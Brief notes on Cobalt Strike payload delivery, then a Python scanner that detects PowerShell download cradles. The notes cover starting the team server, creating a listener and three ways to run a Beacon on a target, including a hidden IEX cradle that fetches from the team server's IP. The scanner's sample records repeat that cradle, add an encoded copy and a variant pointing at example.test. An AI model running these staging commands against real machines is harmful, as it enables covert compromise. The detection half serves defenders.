./teamserver 192.168.137.4 # start the team server (192.168.137.4 is the team server's IP; the client and the payloads connect back to it)
./cobaltstrike # start the client
First create a Listener; every payload below is generated for that listener.
1. exe
Generate the exe file, transfer it to the target machine by whatever means you have, and execute it there.
2. powershell
Run the following command on the target machine. It is a download cradle: the script is fetched from the team server's web service and executed in memory, so nothing has to be written to disk first.
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.137.4:80/a'))"
After it runs, the Beacon checks in to CS. The switches do the following: -nop skips the PowerShell profile, -w hidden hides the console window (the powershell.exe process itself still exists and is visible in the process list), and -c runs the command, where IEX (Invoke-Expression) evaluates the downloaded text. Note that this is not process injection: the payload runs inside the same powershell.exe process that downloaded it, and that command line is a well-known indicator that endpoint tooling looks for.
3. exe
Basically the same as the second method, except that the second one runs through a powershell process, while this one generates an exe file, hosts it on the team server's web service, and has the target machine download and execute it.
Compared with the first exe method you do not need to provide your own transfer channel, because the team server serves the file over HTTP and the target simply downloads it, which is more convenient.
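As an added example, not part of the original notes and not Cobalt Strike's own code, here is the check a defender would run against the powershell method above: a small Python scanner over process-creation records (image path plus command line, as Sysmon Event ID 1 provides) that flags the download-and-execute cradle, including when the same cradle is hidden behind -EncodedCommand. The sample records, the host example.test and the scoring rules are assumptions constructed for this example; the only real input is the command line shown in method 2.

```python
import base64
import re

# Constructed sample process-creation records (image, command line). None of
# them come from a real host; the first and the last reuse the cradle from
# method 2 as the thing to detect, the others are benign decoys.
_STAGER = "IEX ((new-object net.webclient).downloadstring('http://192.168.137.4:80/a'))"
_ENCODED_STAGER = base64.b64encode(_STAGER.encode("utf-16-le")).decode()
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    (POWERSHELL, f'powershell.exe -nop -w hidden -c "{_STAGER}"'),
    (POWERSHELL, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    (POWERSHELL, "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                 "\"Invoke-Expression (New-Object Net.WebClient).DownloadString('https://example.test/stage')\""),
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    (POWERSHELL, 'powershell.exe -c "Get-Process | Where-Object {$_.CPU -gt 100}"'),
    (POWERSHELL, "powershell.exe -nop -w hidden -enc " + _ENCODED_STAGER),
]

# A download primitive plus an in-memory execution primitive is the cradle;
# the hidden window, profile skip and encoding are supporting context only.
DOWNLOAD_RE = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
EXEC_RE = re.compile(r"\biex\b|invoke-expression", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
NOPROFILE_RE = re.compile(r"-nop(?:rofile)?\b", re.I)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Score one PowerShell command line for the download-and-execute cradle."""
    decoded = decode_encoded_command(cmdline)
    # Content checks run over the decoded payload too, switch checks over the raw line.
    text = cmdline if decoded is None else cmdline + " " + decoded
    indicators = []
    if DOWNLOAD_RE.search(text):
        indicators.append("download")
    if EXEC_RE.search(text):
        indicators.append("exec")
    if HIDDEN_RE.search(cmdline):
        indicators.append("hidden-window")
    if NOPROFILE_RE.search(cmdline):
        indicators.append("no-profile")
    if decoded is not None:
        indicators.append("encoded")
    return {
        "suspicious": "download" in indicators and "exec" in indicators,
        "indicators": indicators,
        "urls": URL_RE.findall(text),
        "decoded": decoded,
    }


def scan_events(events):
    """Run the check over (image, command_line) pairs and return the hits in order."""
    hits = []
    for image, cmdline in events:
        if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        result = analyze_command_line(cmdline)
        if result["suspicious"]:
            hits.append({"image": image, "command_line": cmdline, **result})
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["indicators"], hit["urls"])
```

Run on the sample records it flags the three cradle variants (plain, long-form switches, and -enc) and ignores the script file, the cmd.exe record and the interactive query; the extracted URL is what you would pivot on to find the team server. The rule is deliberately keyed on the download plus execute combination rather than on the exact switches, because the same cradle is trivially rewritten with -WindowStyle Hidden or Invoke-Expression, as the third record shows.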